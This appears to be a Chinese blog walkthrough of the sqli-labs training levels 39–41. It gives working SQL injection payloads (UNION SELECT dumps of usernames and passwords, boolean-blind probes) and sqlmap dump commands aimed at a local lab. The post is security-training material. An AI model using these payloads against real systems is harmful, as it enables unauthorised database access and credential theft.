sqli-labs第39~41关

已于 2024-08-21 15:34:10 修改
阅读量285 收藏 3
点赞数 11
分类专栏: sqli-labs 文章标签: sql 数据库
于 2024-08-21 15:33:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46023655/article/details/141393237
版权

第39关

此关与38关为同类型,都是Stacked Queries(堆叠注入)

id=2 and 1=2

id=1 and 1=1

判断为数字型注入

有报错信息,判断字段数为3

id=2%20order%20by%203

 依次判断回显点、数据库名、表名、字段名

id=-2%20union%20select%201,2,3

id=-2%20union%20select%201,2,database()

id=-2%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()

id=-2%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name="users"

id=-2%20union%20select%201,2,group_concat(username,%27:%27,password)%20from%20users

采用sqlmap

python sqlmap.py http://127.0.0.1/sqli-labs/Less-39/?id=1 --dbs

python sqlmap.py http://127.0.0.1/sqli-labs/Less-39/?id=1 -D security --tables

python sqlmap.py http://127.0.0.1/sqli-labs/Less-39/?id=1 -D security -T users --columns

python sqlmap.py http://127.0.0.1/sqli-labs/Less-39/?id=1 -D security -T users --columns --dump

第40关

此关也是堆叠注入,判断为字符型注入

id=2'

id=2'--+

id=2')

id=2')--+

判断为')闭合,依旧存在堆叠注入,无报错信息,可以采用SQL盲注--基于布尔类型

判断出数据库长度为8

id=2%27)%20and%20length(database())=1--+

id=2%27)%20and%20length(database())=8--+

采用sqlmap

python sqlmap.py http://127.0.0.1/sqli-labs/Less-40/?id=1

以上是可以采用的3种方法,采用SQL盲注-布尔型/基于时间,或者采用union select 都可以

python sqlmap.py http://127.0.0.1/sqli-labs/Less-40/?id=1 --dbs

python sqlmap.py http://127.0.0.1/sqli-labs/Less-40/?id=1 -D security --tables

python sqlmap.py http://127.0.0.1/sqli-labs/Less-40/?id=1 -D security -T users --columns --dump


 

第41关

判断为数字型的堆叠注入,无报错信息

oder by 4时

order by 3时

 

略,采用SQL盲注-布尔型/基于时间,或者采用union select 都可以

采用sqlmap

python sqlmap.py http://127.0.0.1/sqli-labs/Less-41/?id=1

熊熊爱吃不胖
关注
  • 11
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs 基础篇 第8~10
Lucky小小吴的小屋
01-13 495
sqli-labs 基础篇 第8、9、10
sqli-labs进阶篇 29~31
Lucky小小吴的小屋
02-06 630
本文章主要讲述sqli-labs靶场第29到32的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sqli-labs通(十八)~(二十二)
qq_65950075的博客
05-05 524
输入正确的账号密码,就会返回显示我们的User Agent信息,这是在我们的post请求里面的信息所以我们用burp suite拦截抓包那我们就可以对这个User Agent下手进行注入当我们把它改成1'时,出现如下报错信息,可以知道语句是由单引号和括号闭合的,但是还有两个参数打开源码看一下有一个insert语句,有三个参数,把我们的User Agent,IP和username插入到数据库的security.uagents中所以我们构造正常,没有语法报错。
基于Sqli-Labs靶场的SQL注入-第6~10
Joker
11-25 2001
本文讲解 updatexml() 函数报错注入、导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
sqli-labs 第七 多命通攻略
两个月亮
01-05 1691
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
sqli-labs 9~10 多命通攻略(Python3 自动化实现时间盲注)
两个月亮
01-13 798
三种输入,sqli-labs 的回显区域显示的内容均,因此我们只能使用基于时间的注入方式。
SQLI-labs-第十五和第十六
weixin_54055099的博客
05-06 954
Sqlilab的第十五和十六,时间盲注
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 435
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
SQL 时间盲注 (injection 第十六
最新发布
baishiqi12的博客
08-20 266
SQL 注入,仅供参考
mysql创建quartz定时任务相sql
xiexf20230814的博客
08-20 319
-存储Cron触发器的cron表达式和其他信息。--接下来,创建索引以提高性能;--存储简单触发器的额外属性。--存储复杂触发器的简单属性。--存储触发器的blob数据。--存储已触发的触发器信息。--存储调度器的状态信息。--存储暂停的触发器组。--存储触发器信息。
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 481
【代码】数据库 - 基础。
sqli-labs第九脚本解释
01-22
sqli-labs第九是一个延时盲注的挑战。在这个挑战中,你需要通过注入语句来判断条件是否为真,并通过延时来判断注入是否成功。 根据你提供的信息,你尝试了时间盲注的方法。你使用了单引号来闭合注入语句,并在其中使用了一个延时函数`sleep(3)`来延时3秒钟。你的请求如下: ``` http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ ``` 这个注入语句的意思是,如果条件为真,那么数据库会延时3秒钟返回结果。通过观察请求的响应时间,你可以判断注入是否成功。 在第十中,你需要使用双引号来闭合注入语句,并且要注意将字符串的双引号变成三引号,以避免闭合的双引号混入其中。 这是sqli-labs第九的脚本解释。如果你有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值